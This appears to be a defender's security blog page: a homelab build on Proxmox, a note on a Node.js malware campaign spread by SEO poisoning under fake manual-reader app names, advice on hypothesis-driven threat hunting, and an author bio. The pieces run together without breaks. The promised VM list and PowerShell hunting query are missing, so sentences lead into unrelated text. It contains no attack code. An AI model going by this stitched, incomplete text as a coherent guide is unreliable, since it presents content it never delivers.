Building a Security-Focused Homelab: Lessons from Week One

Starting my homelab journey has been more rewarding than I expected. After researching budget options, I settled on a Dell OptiPlex 7070 with 16GB of RAM, 256GB of storage, and an Intel i5 8500T. It’s not the most powerful machine on the market, but it’s proven more than adequate for my needs.

The Setup

I installed Proxmox as my hypervisor and spun up several virtual machines to create a functional security testing environment:

We’re seeing a significant uptick in a malware campaign that’s affecting multiple customers. This one’s worth knowing about if you’re in a SOC or working with EDR platforms.

The Campaign

Attackers are distributing malicious Node.js payloads disguised as manual reader and document utility applications. The names are designed to look legitimate: AllManualsReader, OpenMyManual, ManualFinder, AppSuitePDF, and OneStart.

Initial distribution appears to be through SEO poisoning. Users search for manuals or document tools, find these applications in search results, and download what they think is a legitimate utility.

Effective threat hunting queries help you find what automated detections miss. Here’s my approach to building them.

Start with a Hypothesis

Before writing a query, form a hypothesis about adversary behavior. Instead of “check for PowerShell activity,” try “threat actors may use encoded PowerShell commands to download payloads.”

This frames your hunt around specific TTPs rather than casting a wide net.

Build Queries That Surface Anomalies

Here’s a query for hunting suspicious PowerShell usage:

I’m Elmer Phillips, a Security Analyst working in Managed Detection & Response at At-Bay. This blog is where I share practical notes from the SOC. Detection engineering, SIEM queries, threat hunting techniques, and lessons learned from 3 years of blue team work.

Security is a team sport. If these posts help you catch something faster or tune out some noise, that’s a win.